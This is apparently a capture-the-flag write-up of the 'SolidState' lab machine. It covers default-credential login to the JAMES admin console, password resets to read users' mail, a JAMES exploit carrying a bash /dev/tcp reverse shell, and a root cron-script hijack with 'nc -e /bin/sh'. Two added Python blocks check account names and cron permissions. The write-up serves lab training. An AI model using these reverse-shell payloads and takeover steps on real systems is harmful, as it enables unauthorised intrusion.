The first step as always was to run Nmap against the machine:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nmap -p- -oN scan -sC -sV -O 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 13:52 EST
Nmap scan report for 10.10.10.51
Host is up (0.022s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.14 [10.10.14.14]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.22 seconds
Several ports are open, and the JAMES services on 25, 110, 119 and 4555 show that the host is running a mail server. The one of interest is port 4555, the JAMES remote administration interface. I telnetted to this port and was greeted with a login prompt.
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
After some googling I discovered the default credentials for this interface were root:root. I tried these and successfully logged in. I was then able to list the mail users:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
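The account name containing ../ sequences in the listing above is not a harmless oddity: JAMES 2.3.2 derives a filesystem path from the account name, which is what the user-creation exploit used later in this post relies on. As an added defensive example (not code from the original post or from JAMES), this Python validator applies an allow-list plus a canonical-path containment check and audits listusers output; the repository root and the inboxes sub-directory are assumed names.

```python
import os
import re

# Allow-list for account names. The mail store maps each name onto a directory,
# so a name carrying a path separator or ".." must never reach the filesystem.
USER_RE = re.compile(r"[a-z0-9][a-z0-9._-]{0,63}")

def contained(repo_root, user):
    """Second layer: the canonical mailbox path must stay inside repo_root.
    'inboxes' is an assumed sub-directory name, not James's real layout."""
    root = os.path.realpath(repo_root)
    path = os.path.realpath(os.path.join(root, "inboxes", user))
    return os.path.commonpath([root, path]) == root

def is_safe_user(user, repo_root="/var/mail/james"):
    """True only if the name passes the allow-list and cannot escape the store."""
    return (USER_RE.fullmatch(user) is not None
            and ".." not in user
            and contained(repo_root, user))

def suspicious_accounts(listusers_output):
    """Audit helper: parse admin-console 'listusers' output and return the
    account names that fail the check."""
    names = re.findall(r"^user:\s*(\S+)", listusers_output, re.MULTILINE)
    return [n for n in names if not is_safe_user(n)]

# Constructed from the listing shown on this page.
LISTING = """Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
"""

if __name__ == "__main__":
    print(suspicious_accounts(LISTING))  # only the traversal-style name
```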
I then changed the password for each of the users to “password” using the setpassword command:
setpassword mindy password
Password for mindy reset
setpassword james password
Password for james reset
setpassword john password
Password for john reset
setpassword thomas password
Password for thomas reset
setpassword mailadmin password
Password for mailadmin reset
I then connected to port 110 using telnet and attempted to read the emails on the accounts:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass password
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
As you can see from the output, I was able to read Mindy's email using the password I set. The second message contains the username and password she uses to log in to the machine. I then connected to the machine via SSH using the credentials mindy:P@55W0rd1!2@:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 26 12:56:58 2021 from 10.10.14.14
mindy@solidstate:~$ ls
bin LinEnum.sh out.txt thu.txt user.txt
mindy@solidstate:~$ cat user.txt
[REDACTED]
mindy@solidstate:~$
As you can see from the output, this was successful, and I was able to capture the user flag.
Mindy's default shell is rbash, a restricted version of bash, so she cannot navigate outside her home directory. I discovered an exploit HERE which creates a user through the JAMES remote administration tool using a local file inclusion; a payload is then emailed to this user and is executed when someone logs in to the machine.
I modified the payload variable at the top of the script with the following string, which creates a reverse shell back to my machine:
payload = 'bash -i >& /dev/tcp/10.10.14.14/2601 0>&1'
I executed the payload against the Solidstate machine:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# python 35513 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
I then started a netcat listener on port 2601:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2601
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2601
Ncat: Listening on 0.0.0.0:2601
I then logged in via SSH as mindy to trigger the payload:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2601
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2601
Ncat: Listening on 0.0.0.0:2601
Ncat: Connection from 10.10.10.51.
Ncat: Connection from 10.10.10.51:41548.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /
cd /
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$
As you can see, the payload was executed and the reverse shell was captured by the netcat listener. This shell is not running under rbash, so I can now navigate outside the home directory.
I next went on to find a way to escalate privileges. I discovered a file in /opt/ called tmp.py. This file was writable by the mindy user but owned by root, and it appeared to be a script used to clear the /tmp/ directory. I echoed some Python code into this file to spawn another reverse shell back to my attacking machine:
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo "import os;os.system('nc -e /bin/sh 10.10.14.14 2123')" > tmp.py
The hope was that the script runs on a schedule and, since it is owned by root, runs as root. I started another netcat listener on port 2123, the port specified in tmp.py, and waited.
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2123
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2123
Ncat: Listening on 0.0.0.0:2123
Ncat: Connection from 10.10.10.51.
Ncat: Connection from 10.10.10.51:42662.
ls
root.txt
whoami
root
cat root.txt
[REDACTED]
After a few minutes, as you can see from the output, a shell was captured by the listener. It was in fact a root shell, so I was able to capture the root flag.
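The root-owned but user-writable /opt/tmp.py is the classic scheduled-task privilege-escalation condition. As an added example that is not from the original post, this Python audit parses system-crontab lines and reports root jobs whose script files a non-root user could modify; the crontab text and file paths built in demo() are constructed, with the current uid standing in for root so it runs unprivileged.

```python
import os
import stat
import tempfile

def risky_mode(st_uid, st_mode, cron_uid=0):
    """Why a script that cron runs as cron_uid is tamperable, or None (the tmp.py case)."""
    if st_uid != cron_uid:
        return "owned by uid %d but executed as uid %d" % (st_uid, cron_uid)
    if st_mode & stat.S_IWOTH:
        return "world-writable"
    if st_mode & stat.S_IWGRP:
        return "group-writable"
    return None

def cron_script_paths(crontab_text):
    """Yield (user, absolute path) from system-crontab lines: five-field schedule, user, command."""
    for line in crontab_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue
        for tok in fields[6:]:
            if tok.startswith("/"):
                yield fields[5], tok

def audit(crontab_text, cron_uid=0):
    """Return [(path, reason)] for root cron jobs whose files a non-root user could change."""
    findings = []
    for user, path in cron_script_paths(crontab_text):
        if user != "root":
            continue
        try:
            st = os.stat(path)
        except FileNotFoundError:
            findings.append((path, "missing: a writable parent directory would let anyone plant it"))
            continue
        reason = risky_mode(st.st_uid, st.st_mode, cron_uid)
        if reason:
            findings.append((path, reason))
    return findings

def demo():
    """Constructed scenario: one world-writable and one sane script behind root cron entries."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "tmp.py"), os.path.join(d, "clean.py")
    for path, mode in ((bad, 0o666), (good, 0o644)):
        open(path, "w").close()
        os.chmod(path, mode)
    tab = "*/3 * * * * root %s\n*/3 * * * * root %s\n" % (bad, good)
    return audit(tab, cron_uid=os.getuid())  # current uid stands in for root here
```

Run demo() to see the single finding; against a real host call audit() on the contents of /etc/crontab and the files under /etc/cron.d with the default cron_uid of 0.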